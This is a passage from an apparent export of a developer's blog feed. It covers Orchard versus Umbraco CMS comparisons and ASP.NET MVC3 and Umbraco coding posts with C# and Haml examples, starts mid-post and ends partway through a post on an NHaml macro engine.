by different criteria or apply bulk actions.\nIn my article about Creating Content I pointed out that there wasn’t a way to open a page from the admin system, well I stand corrected, you can do it from the Content Items page. So I stand corrected, there is a way, but still kind of expected it to be from the editing screen.\nI also do quite like the way you can do bulk actions, you can unpublish, publish or delete pages. Very handy when you want to clean up a site instance, or deploy live.\nYou may also have noticed a green tick icon next to each content item, that indicates that it is published, alternately if you have unpublished content you get a nice red icon:\nFinding Content in UmbracoUnlike Orchard Umbraco uses a tree based structure for its content, and when you’re going to edit the content:\nFrom here you navigate to the particular content item that you want to edit and click on it.\nDepending on where the content is located it can actually be a little bit more tedious having to navigate down to the appropriate content item, but Umbraco kind of meets this issue in Juno with the new Dashboard. 
The new Dashboard has a Last Edited option which you can go to and then navigate to a content item:\nIt’s not quite as powerful as the Orchard content item filtering but it’s pretty handy, particularly in an Edit -> Review style workflow.\nSome of the options for Umbraco are a little bit more hidden than they are with Orchard; options such as Unpublish are on the Generic Properties tab, along with some of the metadata:\nThis is the opposite of Orchard, which has them up front when overviewing the content items.\nLike Orchard, Umbraco does have a visual indicator as to whether a content item is published or unpublished. With Umbraco unpublished content has a dimmed-out tree icon. Umbraco also has the notion of saving content, meaning that you can make a change and save it into the CMS without publishing it. This is very handy if you’re working in the Edit -> Review workflow, or if you want to start editing a page and come back to it later to finish. These saved changes are indicated in the tree by an asterisk on the content item:\nAlso, with Umbraco most of these options are available off the context menu in the content tree, and this is where you’ll find the Delete option, which is a little bit more hidden than with Orchard.\nA really nice feature about deleting content in Umbraco is that it has the idea of a recycling bin. So far I haven’t come across this feature in Orchard (although I may not have found it yet), but what it means is that when you delete a piece of content it isn’t actually removed; instead it is moved into the recycling bin and removed from the published site. This is a really useful feature and I’ve had it save more than one of my clients’ asses as they “accidentally” remove a piece of content, like say their home page (yes, I’ve had clients delete their home pages, even their entire sites, all by accident, although I’ve never worked out how you can do that accidentally…).\nConclusion\nAgain we’ve seen two different takes on how to perform a task with the two CMSs, with Orchard staying with its minimalistic but direct approach to managing content, and Umbraco being a lot more visual about what you’re wanting to achieve.\n", "id": "2011-01-27-managing-content" }, { "title": "Creating Controllers-as-plugins using MVC3", "url": "https://www.aaron-powell.com/posts/2011-01-25-controller-plugins-with-mvc3/", "date": "Tue, 25 Jan 2011 00:00:00 +0000", "tags": [ "mvc3", "autofac", "funnelweb" ], "description": "A look at how to make pluggable Controllers using MVC3", "content": "Overview\nWhile working on the plugin engine for FunnelWeb we decided that we wanted to add the ability for people to create their own extensions which are Controllers and routes. Seems like a pretty simple idea, and it makes it really easy to add external functionality into FunnelWeb at a Controller level without rolling your own instance.\nBut there’s a catch…\nSome background\nWe’re using MVC3 for FunnelWeb, and part of MVC3 is this lovely new way to do Dependency Injection, the IDependencyResolver interface. We’re using Autofac in FunnelWeb and its latest release (2.4) has MVC3 and IDependencyResolver support.\nThe main role of the IDependencyResolver is so that you can do Dependency Injection without having to reimplement a lot of the MVC core.
Previously you had to create custom Controller Factories, and a bunch of other stuff (depending on what you wanted to DI), but not any more!\nImplementing the Dependency Resolver\nSo this is actually really simple to use; all you need to do to use your own custom resolver is this:\nvar builder = new ContainerBuilder(); builder.RegisterControllers(Assembly.GetExecutingAssembly()); // do other registrations var container = builder.Build(); DependencyResolver.SetResolver(new AutofacDependencyResolver(container)); That’s all you have to do, and now any Controller which you’ve registered will be resolved via Autofac, not Activator.CreateInstance, meaning you don’t have to have a default constructor.\nBut there’s a problem: how do you add Controllers which are not in the current assembly to Autofac so they can be resolved?\nExtending the plugin framework\nWell, to add the new Controller-based extension point I set about expanding how our plugins worked. Previously we had an IFunnelWebExtension interface which you implemented, and it has a single method that initialized it.\nThat was fine for what we originally wanted, but how were we going to register new routes?\nEnter the RoutableFunnelWebExtension.\nTo do this I’ve created a new abstract class, RoutableFunnelWebExtension, and it has some additional information on it: first off it has the RouteCollection so you can register routes, but it also has a method which will resolve Controllers for you. But don’t worry, we’ve done the heavy lifting and you don’t need to register them yourself, we handle it for you :).\nSo we have this method:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) ; } Cool, that’ll handle our registrations. Let’s assume we have a route set up, our extension is in /bin/Extensions, and we’re good to go right… right?\nWrong.\nThis is the point where I started pulling out my hair: when I’d hit the route I configured it resulted in a 404. This is quite strange, as FunnelWeb has a catch-all route so that you can create any page URL you want, so a 404 really isn’t possible.\nAfter some digging it turns out that the route was being hit, and that was exactly why the 404 was happening: the route was matching, but no Controller was being resolved. But hang on, our plugin has registered the Controller, right? If I inspect the container then yeah, I can see it, so why was it not found?\nUnderstanding how Controllers are found\nSo as it turns out the IDependencyResolver isn’t actually the silver bullet which I was expecting it to be; it turns out that the pesky BuildManager is back to spoil my fun.\nSide note: Shannon Deminick has also blogged about plugin engines and the problems which the BuildManager can produce.\nWhen a route is found MVC goes to the IControllerFactory and asks it to create the Controller instance. Out of the box this heads over to the DefaultControllerFactory class, and it eventually goes out to your IDependencyResolver to find it. The catch is, MVC first finds the type of the Controller which matches the route. This is handled by the GetControllerType method, and this is where we’re hitting a problem.\nIn the default instance this will look into the BuildManager to find out what the type is. Now that’s generally fine provided your Controller is in the /bin folder, but the Controller isn’t in there; our extensions are in /bin/Extensions, and the BuildManager isn’t smart enough to look there.
This means that when the Controller type tries to be found it returns null, and in turn MVC assumes that these are not the Controllers you are looking for.\nCrap.\nAs it turns out the default Controller Factory isn’t smart enough to look into the DI container (and well, that’s expected, it’s kind of a rough requirement to force on the DI container), so it looks like we have to implement our own anyway.\nLuckily we don’t need to do a full Controller Factory, we can just extend the default one. What you want to do is extend the GetControllerType method to also go to the DI container.\nTo be able to efficiently locate our Controller type I first want to make it better described in Autofac, so I’ll augment our RegisterControllers method in the plugin framework:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) .Named<IController>(t => t.Name.Replace("Controller", string.Empty)) ; } Now our Controllers are Named registrations, and we can find them by their Controller name:\npublic class FunnelWebControllerFactory : DefaultControllerFactory { private readonly IContainer _container; public FunnelWebControllerFactory(IContainer container) { _container = container; } protected override Type GetControllerType(RequestContext requestContext, string ControllerName) { var Controller = base.GetControllerType(requestContext, ControllerName); if (Controller == null) { object x; if (_container.TryResolveNamed(ControllerName, typeof(IController), out x)) Controller = x.GetType(); } return Controller; } } As you can see here we’re overriding the GetControllerType method. If the base implementation doesn’t return a Controller, which it won’t if a) the Controller isn’t in the BuildManager or b) you’re not routing to a Controller, we’ll see if Autofac knows about it.\nIf Autofac does know about it then we can return its type and we’re going to be right now… right?\nSigh.\nSo my Controller plugin has a constructor argument which I need to be injected, but I’m seeing a lovely YSOD saying that Activator.CreateInstance is unable to create the Controller as there is no default constructor (a constructor with no arguments). Wait, what? Isn’t the IDependencyResolver meant to be resolving it?\nWell yes, but there’s still a problem: once GetControllerType is called the returned type is passed into our IDependencyResolver.GetService method, and Autofac will resolve it, or return null if it can’t find it, and when null is returned the Controller Factory will fall back to Activator.CreateInstance.\nThe reason that the type isn’t found is because the Controller isn’t registered using the type of the Controller, so it can’t be found in Autofac. Well, that’s a very easy one to fix, we’ll just ensure that the registration is registered by its type too:\nprotected internal virtual void RegisterControllers(ContainerBuilder builder) { builder.RegisterControllers(GetType().Assembly) .Named<IController>(t => t.Name.Replace("Controller", string.Empty)) .AsSelf() ; } Now we’re registering the types as their actual type, and now we can resolve them from Autofac using that. And you know what, hitting the route now calls the Controller action correctly.\nConclusion\nWhile MVC3 is yet another good step towards simple extensibility, there are a few pain points when you’re wanting to do stuff that is edge case.
And yet again the major pain point which we’re coming across is the BuildManager.\nBut with a few code tweaks and a custom Controller Factory you too can load a Controller from a folder that isn’t /bin/.\nI hope in future versions of ASP.Net the BuildManager can be made a bit smarter, and work better with types outside /bin.\nIf you’re looking for an alternate way to do plugins I suggest you check out Shannon’s posts.\n", "id": "2011-01-25-controller-plugins-with-mvc3" }, { "title": "Umbraco, Razor and MIX11", "url": "https://www.aaron-powell.com/posts/2011-01-24-mix11/", "date": "Mon, 24 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "razor", "mix11" ], "description": "Help me get a session at MIX11 ;)", "content": "Just a quick heads up, today I got word that my session which I submitted to MIX, Razor and Umbraco, has got through to open call!\nI’ve previously blogged about using Razor with Umbraco, but if you’d like to see a more in-depth talk, and also a look at how you can use MVC3 with Umbraco today, be sure to vote.\nRegardless of whether I get accepted or not I’ll be at MIX11, so if you’re also there feel free to find me and say hi :).\n", "id": "2011-01-24-mix11" }, { "title": "Unit Testing with Umbraco - Video", "url": "https://www.aaron-powell.com/posts/2011-01-20-video/", "date": "Thu, 20 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "unit-testing-with-umbraco" ], "description": "Video of my Unit Testing with Umbraco session from CG10", "content": "It’s possibly old news but I only just found out today, the recording of my Unit Testing with Umbraco session from CodeGarden 10 is available online for viewing.\nApparently the audio isn’t great, but I’m sure you can get the gist of it ;).\nThe video is available here, and while you’re at it check out the other CodeGarden 10 session videos.\n", "id": "2011-01-20-video" }, { "title": "How to get the field name for a model property", "url": "https://www.aaron-powell.com/posts/2011-01-19-find-name-from-field/", "date": "Wed, 19 Jan 2011 00:00:00 +0000", "tags": [ "asp.net", "mvc", "web" ], "description": "Ever needed to find the name that'll be generated for a property in MVC? Here's how", "content": "I’m working on a custom EditorTemplate for a FunnelWeb around the new tagging system that I’m working on.\nIt’s quite a complex editor that I’m doing, and it’s being bound against a collection, an IEnumerable<T> in fact. But I have a problem, I need to be able to find out the Name that would be generated for the model property.\nIf you do something like:\n@Html.EditorFor(x => x.StringProperty) You will get an input like this:\n<input type="text" name="StringProperty" /> But I need the Name, how do you do it?\nThe other week when I was browsing through the Orchard source I came across this gem, and I knew one day I was going to need to do it, but you can get it from the ViewData of the HtmlHelper instance, just like this:\n@Html.ViewData.TemplateInfo.GetFullHtmlFieldName(string partialFieldName) Here’s the MSDN doco if you’re interested in reading it. 
But that’s not really useful, you need to pass a string in, that’s not really useful, I’ve got a Model property to work with, well you can nicely convert a Lambda expression, using the ExpressionHelper class (link).\nHere’s an extension method which will do what I need:\npublic static string FieldNameFor<T, TResult>(this HtmlHelper<T> html, Expression<Func<T, TResult>> expression) { return html.ViewData.TemplateInfo.GetFullHtmlFieldName(ExpressionHelper.GetExpressionText(expression)); } I got the source from the Orchard project, you can find it here.\nNow you can easily get the Name for any property.\n", "id": "2011-01-19-find-name-from-field" }, { "title": "Orchard & Umbraco - Creating Content", "url": "https://www.aaron-powell.com/posts/2011-01-16-creating-content/", "date": "Sun, 16 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "orchard" ], "description": "In this article we'll look at the difference between the two systems when it comes to creating content.", "content": "OverviewIn this article we’re going to continue our series in looking at the differences between Orchard and Umbraco. Today we’re going to be looking at creating content.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nCreating content in OrchardAs I mentioned in my last post about admin systema I pointed out that the first most option in the navigation is for creating content, and here we’re going to go through the workflow of creating content. First off we’ll create a new page\nSo this will create a new piece of content using the Content Type of Page, which then takes us to the following editing screen:\nThis is a full list of all the properties which I can edit for this page, I can put in a title, I can set the URL (which is auto-generated from the page title by stripping spaces and other special characters). Theres then a nice big text editor which uses TinyMCE as the WYSIWYG editor. Lastly there’s an option to set the tags for the page, and finally some options regarding to publish.\nI can’t really fault it, the only thing that confuses me is the Tags option, I’m not exactly sure why I would want this on just any page, but yes, you can remove.\nI’d say that it’s because I’ve spoiled by Umbraco as when you create links (or add media) using the Orchard version of TinyMCE you have to enter the URLs yourself. This is a bit of an annoyance when you don’t know the paths of what you want to link to directly. I also am not sure what impact this would have when you modify URLs, I haven’t dug into that, but I’d expect that it’d cause links to break.\nBut that said I actually quite like the ability to full-screen the TinyMCE instance, this is really good if you’re working with large content blocks.\nOnce finished I click save and unsurprisingly my new page 404’s:\nSomething I noticed when trying to navigate to this page I noticed that there wasn’t any link on the create page, I’m not sure if I’m just blind or it’s actually not there. Personally I think this would be really useful, it makes it easy to get to your new page.\nAlso, I can’t see to find any kind of preview function in Orchard pages.\nLet’s go back and publish a page, you can publish the page right now or set up a scheduled publish of the content. I’m going to publish it now as that’s what I want done, and now our page is live!\nSo I chose to have this page added to the navigation, put some basic information in and that is how it looks. 
Obviously the Tags seems a bit silly, but if you remove them nothing around it will be displayed for it.\nAnd that’s it, we’ve built a page in Orchard!\nCreating content in UmbracoWith Umbraco there is two ways which you can create new content, there’s a link in the upper left, or you can do it from the context menu of the tree:\nI’ll admit that I’ve never used the upper left create button, I’ve always found it makes a lot more sense to create it in place from the content tree, so what’s what I’m doing. Choosing create will then give you a new dialog, allowing you to enter the page title and select the page type:\nThis is a bit more of an involved process than Orchard, but it does have a purpose. In my admin system post I mentioned that Umbraco seems to have more of a concept of hierarchy in the pages, and this dialog is used to place restrictions on what Document Types can be placed where in the site structure. I see this as a really useful feature, it allows you to create very special site layouts by putting restrictions around your content editors without their knowledge.\nOnce you have a new page you’ll see that there’s a difference between Orchard and Umbraco again. Unlike Orchards full view of what is going able to be edited Umbraco uses a tabbed UI:\nI can’t decide what I prefer, the Umbraco or the Orchard UI, both have pros and cons, and both make sense in the context of their parent UI. It’s up to you to decide which is your preference.\nUmbraco also uses the TinyMCE editor, but it’s a slightly customized version of it. With Umbraco the media and link dialogs allow you to interact with the CMS and select existing pages or media items which have been uploaded in the system, you don’t have to remember the URLs.\nOnce I’ve populated all my content I then save the page and then I want to view it, like I did in Orchard. Unlike Orchard Umbraco has a preview feature (and if you’ve worked with older version of Umbraco there is a limit with the preview engine and XSLT, but that’s fully resolved now):\nThis gives a view of the page, with a not-so-friendly URL (it’s the ID of the page), and a nice banner to indicate that it’s in preview mode:\nSweet, I can view my content before going live, and this is a really useful feature, content editors like being able to see what their new page will look like without it going live.\nOnce you save and publish you’ll be able to navigate to the full URL as well. The URL is on the General Properties tab as well, so you can click on it and navigate straight to the page. Again a small feature but it’s really handy.\nConclusionTo wrap up we’ve looked at what it’s like to create a page in each system. Umbraco is a bit more involved a process, and it gives you a lot of flexibility-by-restrictions, where as Orchard is less restricted about what it allows you to do.\nThere’s a few small things about Orchard I didn’t like, the lack of easy way to open a page from the edit screen, and the missing preview feature (or at least, I didn’t find it!). But keep in mind Orchard is only v1, I expect that preview would come in future versions, so keep an eye out for it.\n", "id": "2011-01-16-creating-content" }, { "title": "Orchard & Umbraco - The Admin", "url": "https://www.aaron-powell.com/posts/2011-01-15-admin/", "date": "Sat, 15 Jan 2011 00:00:00 +0000", "tags": [ "umbraco", "orchard" ], "description": "A look at the admin systems for Orchard and Umbraco", "content": "OverviewIn this article I’m going to have a look at the admin systems for the two CMSs. 
You can consider this a ‘first look’ although in reality this isn’t my first look at either admin systems I’ll do my best to pretend ;).\nFirst off let me say that there is a good overview of the Orchard admin on their website, and this post isn’t to try and replace it or anything, it’s more my opinion of it.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nThe Orchard AdminTo get into the Orchard admin you log into /admin and put in the details from your setup process, when logging in you see something like this:\nTo me this look pretty slick, I really like the look of it, it’s very current web, and I like it. Also there’s a nice friendly message welcoming you to Orchard, which I find to be a nice touch.\nFunctionality wise your primary point of call is the navigation bar:\nThis is quite different to the navigation system of Umbraco (which I’ll come to shortly), its a text-based navigation, which isn’t as unintuitive as you’re initially think. I say this because I’m a visual person so I find graphical navigations quick to pick up.\nBut that said Orchard has some nice features that make it very intuitive. First off the top most item of the navigation is the point you’ll be looking for most of the time, a new page link.\nWith a few clicks you can easily hide off pieces you don’t require at the current point in time (the arrow next to the section headings). This makes the Orchard admin something very simple and straight to the point of what you’re trying to do, manage a site.\nWhat I Like As I’ve said I quite like the UX experience of the Orchard admin, I find it quite ascetically pleasing.\nI like the way that Orchard has you create content, that underneath the New option it lists out the types which you can create.\nLastly I like the way Orchard provides a direct link back to your Orchard website. It may be a small feature, but it’s surprisingly useful a feature.\nThe Umbraco back-officeWith Umbraco its administration system is most commonly referred to as the back-office, and is accessible via /umbraco/ (previously that would redirect to a page which launched a popup, but that was removed in v4.5). If you’ve seen the Umbraco in the past (say before Juno) then you’ll know that it can be a bit daunting, upon logging in you were often presented with a very play looking interface. Well luckily with Juno it’s been updated nicely and this is what the Juno default back office looks like:\nAlready you can see the primary difference between the two systems, Umbraco has much more of a direct focus on content management.\nAnother major difference is the tree down the left hand side. This is to do with the fact that Umbraco has much more of a hierarchical content focus than Orchard.\nFor navigating around the back office Umbraco has sections:\nThe difference sections load up different contextual information, but in the same UX as posted above. Because the sections are hidden behind a full UI refresh, meaning that if you’re not exactly sure what you’re looking for you can perform a few wrong clicks (been there, done that :P).\nWhat I like Putting on my content editors hat I do like the fact that Umbraco defaults to loading me into the content editing section of the back office; it’s my primary focus at that time so saving me digging around is a benefit for sure.\nAnother thing that I like about Umbraco, which I didn’t come across in Orchard, is the auto-locking feature. 
This is a new feature in Juno (and replaces the keepalive.aspx file which caught me off guard more than once), and it works like this:\nIn this instance I haven’t interacted with Umbraco for a few minutes (a time period which is set in the web.config in <add key="umbracoTimeOutInMinutes" value="20" />). Umbraco will then count down to zero and once you get there you’ll get this:\nNow Umbraco can’t be interacted with until you log in again. From the point of view of a content editor I can see the auto-locking feature to be very handy, especially if you’re in an organisation which security is really a concern.\nConclusionIn this article we’ve had a very quick look at the admin systems of both Orchard and Umbraco. This article wasn’t intended to be a deep look into the admin systems, nor was it to look into features which make up the system, it was more a first impressions article.\n", "id": "2011-01-15-admin" }, { "title": "Orchard & Umbraco - Introduction", "url": "https://www.aaron-powell.com/posts/2011-01-12-orchard-umbraco/", "date": "Wed, 12 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "An introduction to a series of looking at comparing Orchard CMS and Umbraco", "content": "OverviewIncase you haven’t heard Orchard CMS has hit version 1.0, and at pretty much the same time Umbraco Juno (4.6) also has been released. I think this is a great chance to do a bit of a comparison between the two products and hopefully provide people with some insight into both products.\nI’m going to only be looking into some very simple aspects of it, doing a 100% feature-by-feature comparison would be really time consuming and probably make for a boring blog post, but never the less, we’ll get cracking now.\nThis is being written from the point of view of an Umbraco core team member, that means that this may seem bias towards Umbraco but believe me I will do my best to be objective on all points throughout this comparison.\nArticlesHere is the list of articles in the series:\nInstall experience Admin Systems Creating content Managing Content ", "id": "2011-01-12-orchard-umbraco" }, { "title": "Orchard & Umbraco - The install experience", "url": "https://www.aaron-powell.com/posts/2011-01-11-orchard-umbraco-installing/", "date": "Tue, 11 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "A comparison between the install experience between Orchard CMS and Umbraco Juno", "content": "OverviewIn this article I’m going to be looking at the install experience of Orchard and Umbraco and what are the differences between the two.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nThe Install ExperienceFor this article I’ve gone out and grabed the Orchard 1.0 release and Umbraco 4.6.1 release (Web Deploy version), and the first thing I noticed is that they are basically the same in terms of download size, with Orchard being slightly smaller, it’s 7.08Mb where as Umbraco is 7.50Mb. This is nice, both are sub 10Mb (by a long way), and something I wouldn’t have a problem storing in a source control system.\nI’m going to use IIS Web Deploy for both installs, this way we’re playing on a equal footing from the get go. I could have use the Microsoft Web Platform Installer (Web PI) for it, but at the time of writing the Umbraco instance in Web PI I found to be 4.5.2, which is not the latest stable (Note: Since writing this post Umbraco Juno 4.6.1 is now available in Web PI). 
For both products if it’s your first install, or you’re not someone who’s familiar with IIS I’d strongly recommend that you use Web PI, in fact it’s the recommended install process for both of them.\nWith both releases downloaded it’s time to get started on actually installing.\nConfiguring IIS For this I’m going to assume some basic IIS knowledge, and that you have Web Deploy already installed on your machine.\nThe first thing that you need to do is create an empty IIS web site for each project (Umbraco does run in virtual directory, and I’m sure Orchard does to, but I want to run them as stand alone applications, that’s how I would be using them in a production instance so it makes sense for me), I’ve created one called orchard-v1 and one called umbraco-461:\nNext you need to select one of the web sites (I’m starting with Orchard) and use Web Deploy to import the downloaded package.\nInstalling Orchard Once we kick off the Web Deploy install we get an overview of what Orchard is going to install, a nice simple overview:\nCool, it’s nice and simple, just two folders that it needs to access, App_Data and Media, that’s quite nice but I’m not sure what that means for plug ins (but that’s an issue for another day :P). Click next and we’ll work with the database which I can choose if I want to use an existing database or if we want to create a new one, or not have a database at all. I’m wanting to have the full experience, so I’m going to create a new database, this takes us to the next step which has a nice large set of options:\nNow I can configure all my settings, Orchard wants to install into a virtual directory, so I’ve blanked out the first property as I want it to be in the root of the web site I created in IIS. I put in my database information and click next.\nThis brings us to the end of the IIS install in which I receive a nice overview of what was just done.\nSweet, Orchard is installed, now let’s go onto Umbraco.\nInstalling Umbraco I start by selecting my Umbraco IIS web site, choosing to import from the downloaded package, and again we get an overview of what Umbraco is going to do:\nThe first thing I think is WOW, that’s a LOT of folders which Umbraco needs to configure permissions for! As an experienced Umbraco user I tend not to think twice about it, but someone new Umbraco might find this strange. The majority of these folders are required for the plugin support of Umbraco, and a bit of a by-product of there not being a ‘simpler’ plugin format (ie - a single folder where plugins would go). You can get away with changing many of those permissions later, but at the moment you have to accept it and move on :P.\nLike with the Orchard install Umbraco will ask if you want to do a database or not. Again I’m going to choose to install a new database just as I did with Orchard. And just like Orchard theres a set of fields to set the path (again I want it at the root so I clear that field), the database information, etc:\nSomething that’s interesting about this form as opposed to Orchard I was only asked to enter the database passwords once each, where as Orchard asks you to confirm the database user password (and the admin password if you’re created a new database too). There’s benefits to both and there’s annoyances to both so I wouldn’t say that either is my preferred solution. 
I’ll admit I didn’t try putting in non-matching passwords so I don’t know how Web Deploy would handle it vs a wrong password, but that’s something for someone else to try out (this post is going to be long enough, I don’t want to add every conditional branch into it).\nOnce I click next and Web Deploy finishes you get a similar summary as you get with Orchard (and I won’t bore you with the screenshot this time :P).\nAnd that’s it, we’re done with installing our sites. Now we’re going to configure our two web applications.\nConfiguring Orchard So I’ve fired up my browser and navigated to the Orchard site I just installed, and the first thing I’m given is an option to configure it:\nHang on a sec, what’s the prompt about databases, I thought I did that as part of the Web Deploy process? I would have expected that to be set up, oh well let’s just select the settings again:\nHmm… not even the connection string information was set in there so I now have to manually enter a connection string, this is rather annoying as I’ve already gone through this with the Web Deploy process. At least the Orchard team have put in the information about what a connection string would look like that you can use as a template, because after all who remembers the format of a connection string without Google, sorry Bing :P.\nAnyway I filled out all my settings, clicked Finish and bang, my website is ready for work:\nFantastic! Let’s have a go at configuring our Umbraco install.\nConfiguring Umbraco If you’ve looked at Umbraco in the past you’ll probably know that it’s had a reputation as having an underwhelming install experience. It looked tired and wasn’t really representative of the product that Umbraco is today. Well, good news, this has been revamped in Umbraco Juno, and the installer is looking very sexy indeed.\nUmbraco first starts up with an overview of the installer steps that you’ll be going through:\nNext we’re presented with the license which Umbraco ships with (MIT if you’re not going to read the picture):\nI quite like this (from an open source standpoint), since it’s an open source project it’s good to know what the license is up front. Orchard too is open source, but if you have concerns about using open source, having the license thrust in your face gives you a final chance to bail out.\nOn a side note I wasn’t actually aware of what the Orchard license was, I didn’t see a direct link from the home page (it’s on the Mission Statement page though). It is quite prominent on the CodePlex site though, and it’s the New BSD license if you’re interested.\nOnce you accept the license you move onto the screen where you configure your database. Like Orchard it doesn’t seem to realise I already did the database setup steps, but unlike Orchard when I clicked ‘Yes I have a database’ the following form fields are already populated with my connection string information. Bit of a win on top of Orchard, I don’t have to put it in again (assuming you’re using MS SQL, I’m not sure what happens with the other database options). A nice side note on the database installer is that there are a few more options than with Orchard including MySQL, which I’m not sure if Orchard supports or not. This is obviously something to keep in mind for hosting provider choice too.\nMoving on I am asked to set my admin details:\nNow that I’ve finished configuring my user I finally get to the point of choosing some defaults for my site.
This is new in Umbraco Juno (well it’s a revamp from what was previously available as starter kits):\nI’m going to use a blog, since the default Orchard install is a blog as well, and next I get to choose one of the default skin options:\nWe’re going with a basic theme which is similar to the one which is used by Orchard, again I’m trying to get the experience between the two as similar as I can.\nAnd now we’re finished, Umbraco gives us a finishing screen:\nFrom here you can launch into the back office or view the site that we’re just installed:\nAnd we’re done!\nConclusionTwo CMS products, two different install experiences. I quite like the simple experience which Orchard provides you with, a lot of the time that I’m working with a CMS I’m not interested in starter kits or anything, I already have a set of requirements to work with and they don’t match what comes with the starter kits.\nThat said though Orchard does install some basic content pages, and I don’t know how you install without them (there was no obvious option I came across) and this is a bit annoying as once it’s installed I have to go back and remove them anyway. It’d be nice if I could have a way in which you could install a completely blank Orchard instance (and if there is a way please let me know).\nUmbraco on the other hand has a rather involved configuration process, and it has a number of different starter kits which you can choose from, or you can choose to install a blank site (sorry my screenshot cut that option out). For me this is a much nicer option since often I’m wanting a blank CMS. That said the configuration experience is a bit more tedious as it’s quite verbose in the steps that you need to go through, which is both a pro and a con, it gives a lot of visibility, but if you’re an experienced user like myself you’ve seen it all a thousand times before.\nBoth products have really polished looking install experiences, and in my opinion both have pros and cons. I like the simple, no-fuss experience of Orchard, but I am bothered by the fact that it didn’t detect my database settings from the Web Deploy steps. Umbraco on the other hand did pick up the database information (to a certain extent) and has a much wider variety of starter kits for getting going, but it’s a lot longer a process.\n", "id": "2011-01-11-orchard-umbraco-installing" }, { "title": "NHaml Umbraco MacroEngine", "url": "https://www.aaron-powell.com/posts/2010-12-28-nhaml-umbraco-macroengine/", "date": "Tue, 28 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "How to implement a fully functional custom Umbraco MacroEngine using NHaml language", "content": "In a previous post I introduced the new IMacroEngine interface coming as part of Umbraco Juno (4.6) which will make it possible to create your own Macro Engines. 
In this article I’ll look at what is required to create a custom Macro Engine which is actually useful.\nImplementing a Haml-based macro engine I’m quite a fan of Haml, it’s a good abstraction on top of HTML (well, XML really) and it’s really popular in the Ruby community.\nA Haml file would look something like this:\n.content this is the text content of a page %a{:href => "http://aaron-powell.com"} My Website And generates a snippet like this:\n<div class="content"> this is the text content of a page <a href="http://aaron-powell.com">My Website</a> </div> There’s a .NET port of Haml, NHaml, so let’s have a look at how we can implement a macro engine which allows us to use Haml within Umbraco.\nI started by grabbing the latest version of NHaml from their website and a copy of Umbraco Juno, and fired up Visual Studio. I created a new .NET class library and added the following references:\nNHaml, cms, interfaces and businesslogic. Next I created my Macro Engine:\npublic class NHamlMacroEngine : IMacroEngine { public NHamlMacroEngine() { SupportedExtensions = new List<string> { "nhaml", "haml" }; } public bool Validate(string code, INode currentPage, out string errorMessage) { throw new NotImplementedException(); } public string Execute(MacroModel macro, INode currentPage) { throw new NotImplementedException(); } public string Name { get { return "Haml Macro Engine"; } } public List<string> SupportedExtensions { get; private set; } public Dictionary<string, IMacroGuiRendering> SupportedProperties { get { throw new NotImplementedException(); } } } With my macro engine I’m going to support files with a haml and nhaml extension (so existing templates can be used) and it’s specified in the constructor (you can set this as the return of the property but I don’t see the need to create the List each time the property is accessed ;)).\nImplementing macro execution The crux of what we have to build for a Macro Engine is in the Execute method.
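Before wiring in NHaml it can help to see the smallest thing Execute could do, just to make the contract clear. This is a throwaway sketch of my own (not part of the final engine), using the same IOHelper.MapPath and SystemDirectories helpers the real implementation below relies on; it simply resolves the macro’s script file and echoes the raw contents back:
// Throwaway sketch: resolve the macro's script file and return its raw contents.
// This only proves the plumbing (file resolution, returning a string) before any Haml parsing happens.
public string Execute(MacroModel macro, INode currentPage)
{
    var path = IOHelper.MapPath(SystemDirectories.Python + "/" + macro.ScriptName);
    return System.IO.File.ReadAllText(path);
}
Obviously that renders the template source rather than the template output, so let’s do it properly.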
This method is nicely providing us with the macro itself and the current page (which all current macro engines provide to users), so how do we go about it?\nNow we’re going to delve into NHaml and what is actually required to execute our file.\nThe heavy lifting for most of our work will be done via the TemplateEngine class from NHaml, but I’m going to have a bit of a wrapper:\npublic class NHamlTemplateEngine : ITemplateContentProvider { public IList<string> PathSources { get; set; } public IViewSource GetViewSource(string templateName) { throw new NotImplementedException(); } public IViewSource GetViewSource(string templatePath, IList<IViewSource> parentViewSourceList) { throw new NotImplementedException(); } public void AddPathSource(string pathSource) { throw new NotImplementedException(); } } I’m going to ignore a lot of what this class does (partially cuz I couldn’t be bothered working out what it does :P), instead I’ll just be implementing the GetViewSource method:\npublic IViewSource GetViewSource(string templateName) { return new FileViewSource(new FileInfo(templateName)); } What we’re doing here is returning the standard OOTB IViewSource implementation, it’ll read the Haml file in from the file system and perform its black magic.\nThere’s currently no way which we can get the single string result back from the template to be used with the macro, so let’s work on that.\nFirst I’m going to be adding a new method to the NHamlTemplateEngine which will return a string from our template to give back to the macro engine:\npublic string Render(MacroModel macro, INode node) { var templateEngine = new TemplateEngine(); templateEngine.Options.TemplateContentProvider = this; CompiledTemplate res = templateEngine.Compile(IOHelper.MapPath(SystemDirectories.Python + "/" + macro.ScriptName)); using (var output = new StringWriter()) { var instance = res.CreateInstance(); instance.Render(output); return output.ToString(); } } Now we’ll finish off our IMacroEngine implementation by implementing the Execute method:\npublic string Execute(MacroModel macro, INode currentPage) { var engine = new NHamlTemplateEngine(); var output = engine.Render(macro, currentPage); return output; } Compile, drop the assembling into a Juno install and create a sample little Macro:\n%p some content here Add the macro to a page and booyeah, we are running our own template engine. You can now write Haml and output it within Umbraco.\nExtending our implementation Ok, so we’ve done our implementation, but it’s a bit limited, there’s two things which we aren’t really handling:\nHow do I access the currentPage in the macro? Can I use the new inline macro feature? Supporting inline macros This is a rather easy feature to support, the MacroModel which has been passed in has a property which we can access that, this comes through the ScriptCode property of the macro.\nBut wait, we’re passing in the phyisical template to NHaml, what are we going to do about that? 
